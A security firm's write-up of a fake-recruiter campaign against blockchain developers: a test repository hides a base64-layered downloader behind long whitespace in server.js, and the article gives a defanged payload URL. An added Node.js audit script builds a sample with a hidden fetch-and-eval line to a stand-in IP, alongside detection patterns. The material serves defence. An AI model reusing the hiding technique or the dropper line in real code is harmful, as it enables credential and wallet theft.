Hackers are increasingly trying to hack large companies or projects through developers, offering them jobs

Find jobs or trouble. A new threat to blockchain developers and crypto projects

11.04.2025

Hacking, while hard work, is anything but boring: attackers constantly need new ways to deceive even the most experienced professionals, and those methods get more sophisticated every time. GetBlock AML Research has analyzed one of the threats that blockchain developers and crypto projects can run into while looking for work.

Who pulls the strings

One of the first widely known cases of an organization being compromised through its employees is the Bangladesh Bank heist. Starting in 2015, the Lazarus Group, a hacker group with alleged ties to North Korea, spent about a year sending the bank's employees phishing emails with malicious attachments. Eventually one of them worked: an employee opened the malicious file, the attackers gained a foothold in the bank's infrastructure, and from there it was only a matter of time before the money moved. In February 2016 Lazarus Group stole $81 million.

Ten years later the same technique is still in use, but with far more polished social engineering: the attackers now pose as recruiters looking for highly paid specialists. Below is a real case in which they tried to get into an organization by compromising one of its employees.

On the hook

The target received an email from a fake recruiter describing the project, the terms of employment, and the skills required of the candidate. The text was as close as possible to a genuine offer and contained no suspicious wording.

A real letter from an attacker in Google Mail

The letter also said that the recipient had been recommended for the open position, which is why the "employer" was interested in him specifically. According to the cover story, the candidate was to develop a smart-contract-based gaming platform for betting. The "recruiter" even supplied working materials: a Figma link to the preliminary design of the project.

The employment process was also described in advance by the attacker and consisted of three stages:

  1. Background and skills check
  2. Test design task
  3. Technical interview

At the first stage the attacker showed no suspicious signs; he gave himself away only at the second. He began calling the applicant and pressing him to complete the test assignment as soon as possible because the project urgently needed a developer. The potential victim was then sent a link to a repository.

Repository content

The repository's content, description, and metadata are fully consistent with the declared project. Only a careful read of the code reveals something odd. The most interesting part is hidden in the server.js file on line 46.

An attempt to hide the code using spaces in the server.js file

At first sight the line looks empty. In fact the code on it is preceded by a long run of spaces, so it sits far to the right of the visible area and you have to scroll horizontally to see it. The hidden code contains a function that downloads the malicious payload to the device.

The hidden part of the code in the server.js file

Even if the hidden download is spotted, the payload is not obvious at a glance: the string is base64 encoded several times over, so it has to be decoded layer by layer before it can be read. The exploit is also designed so that the victim notices nothing even after a successful compromise: if the project is compiled and run, everything works as expected.

WARNING: Do not run suspicious code on your own devices. All operations below were performed in a virtual machine.

Compiled project with malicious code

After the project is compiled and launched, the application the fake recruiter described opens. Outwardly nothing looks wrong, but the suspicious code in server.js sends a request to http://216.173.115[.]200:1244/s/bc7302f71ff3 to download two malicious files, test.js and .npl.

Downloading malicious test.js and .npl files

The test.js script steals browser data, in particular saved accounts and crypto wallet private keys. The .npl trojan provides control of the device. Once launched, both files contact the attacker's server and send it the collected data. At that point the compromise is complete.
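To make the two tricks in this sample concrete (the line pushed off-screen by spaces, and the payload wrapped in several layers of base64 that ends in a download from a bare IP address), here is an added example that is not part of the article and is not the attacker's code: a small Node.js audit script to run over a handed-over repository before opening it in an IDE. It flags lines whose first visible character comes after a long run of blanks, peels nested base64 string literals, and reports raw-IP download URLs and dangerous sinks such as eval(). The server.js it scans is constructed for the example; the hidden payload is harmless text that is decoded but never executed, and 203.0.113.7 is a documentation address (RFC 5737), not the indicator from the real case.

```javascript
// Added example, not code from the article or from the attacker's repository.
// A pre-run audit for JavaScript received from a "recruiter": finds code hidden
// behind long runs of spaces, peels nested base64 literals, and reports raw-IP
// download URLs and dangerous sinks. The sample input below is constructed.

// --- constructed sample: a server.js whose 4th line hides the dropper -------
const HIDDEN_PAYLOAD =
  'fetch("http://203.0.113.7:1244/s/example").then(r => r.text()).then(eval);'; // never executed
const b64 = (s) => Buffer.from(s, "utf8").toString("base64");
const TRIPLE_ENCODED = b64(b64(b64(HIDDEN_PAYLOAD))); // three base64 layers

const SAMPLE_SERVER_JS = [
  'const express = require("express");',
  "const app = express();",
  'app.get("/", (req, res) => res.send("Betting platform API"));',
  // 400 spaces push the real content past the right edge of the editor
  " ".repeat(400) +
    `const k = "${TRIPLE_ENCODED}"; eval(Buffer.from(Buffer.from(Buffer.from(k, "base64").toString(), "base64").toString(), "base64").toString());`,
  "app.listen(3000);",
].join("\n");

// 1. Lines whose first visible character comes after minPad or more blanks.
function findPaddedLines(source, minPad = 100) {
  const re = new RegExp(`[ \\t]{${minPad},}(?=\\S)`);
  const hits = [];
  source.split("\n").forEach((text, i) => {
    const m = re.exec(text);
    if (m) {
      const column = m.index + m[0].length + 1; // 1-based column where the code starts
      hits.push({ line: i + 1, column, snippet: text.slice(column - 1, column + 39) });
    }
  });
  return hits;
}

// 2. Decode base64 repeatedly while the result is printable ASCII that is
//    itself base64-shaped; returns the number of layers removed.
const B64_SHAPE = /^[A-Za-z0-9+/]+={0,2}$/;
const isPrintable = (s) => /^[\x20-\x7e\t\r\n]*$/.test(s);

function peelBase64(str, maxLayers = 10) {
  let text = str;
  let layers = 0;
  while (layers < maxLayers && text.length % 4 === 0 && B64_SHAPE.test(text)) {
    const next = Buffer.from(text, "base64").toString("utf8");
    if (next.length === 0 || !isPrintable(next)) break;
    text = next;
    layers += 1;
  }
  return { layers, text };
}

// 3. Long base64-shaped string literals in the source, peeled layer by layer.
function findEncodedStrings(source, minLen = 24) {
  const re = new RegExp("([\"'`])([A-Za-z0-9+/]{" + minLen + ",}={0,2})\\1", "g");
  const out = [];
  source.split("\n").forEach((text, i) => {
    for (const m of text.matchAll(re)) {
      const peeled = peelBase64(m[2]);
      if (peeled.layers > 0) out.push({ line: i + 1, ...peeled });
    }
  });
  return out;
}

// 4. URLs pointing at a bare IP address, optionally with a port.
const RAW_IP_URL = /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?(?:\/[^\s"'`)]*)?/g;
function findRawIpUrls(text) {
  return [...new Set(text.match(RAW_IP_URL) || [])];
}

// 5. Sinks that turn strings into code or reach the filesystem / processes.
const SINKS = [
  ["eval", /\beval\s*\(/],
  ["new Function", /\bnew\s+Function\s*\(/],
  ["child_process", /child_process/],
  ["fs.writeFile", /\bwriteFile(?:Sync)?\s*\(/],
];
function findSinks(source) {
  const hits = [];
  source.split("\n").forEach((text, i) => {
    for (const [name, re] of SINKS) if (re.test(text)) hits.push({ line: i + 1, name });
  });
  return hits;
}

// Whatever the literals decode to is searched for download URLs as well.
function auditSource(source) {
  const paddedLines = findPaddedLines(source);
  const encodedStrings = findEncodedStrings(source);
  const decoded = encodedStrings.map((e) => e.text).join("\n");
  const rawIpUrls = findRawIpUrls(source + "\n" + decoded);
  const sinks = findSinks(source);
  const suspicious =
    paddedLines.length > 0 || rawIpUrls.length > 0 || (encodedStrings.length > 0 && sinks.length > 0);
  return { paddedLines, encodedStrings, rawIpUrls, sinks, suspicious };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(auditSource(SAMPLE_SERVER_JS), null, 2));
}
```

On a real repository, walk the tree and call auditSource on every .js/.ts file, and treat any padded line, multi-layer base64 literal or raw-IP download URL as a reason to stop and continue the review only inside an isolated VM. The whitespace check is cheap to bypass (tabs, zero-width characters, a minified one-liner), so it complements reading the code rather than replacing it.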

How a developer can protect himself

The case above is not the only way attackers deliver malicious code: fake recruiters also approach potential victims via Telegram, Discord, and other channels. To protect yourself from such schemes:

  • Verify every job or freelance offer against official sources, and confirm the contact through the company's or project's official representatives;
  • Study any third-party code before downloading or running it, including install hooks such as npm postinstall scripts, which run before you have read a single line. Any interaction with unknown code belongs in a virtual machine, ideally one with no access to your wallets, SSH keys or browser profiles;
  • Do not let the other side rush you: an "urgent" deadline is there to make you skip security precautions;
  • Be especially suspicious of offers whose pay is far above the market rate;
  • Disable automatic downloading of files and media in Telegram, Discord, and other messengers.

How to protect your company

  • Train staff to recognize phishing and the tools attackers use;
  • Regularly simulate such attacks on employees, observe how they react, and debrief afterwards;
  • Use security tooling that flags malicious links and attachments in messengers and email clients;
  • Keep secrets (signing keys, credentials, production access) off developer workstations wherever possible, so that a single compromised machine leaks as little as possible.
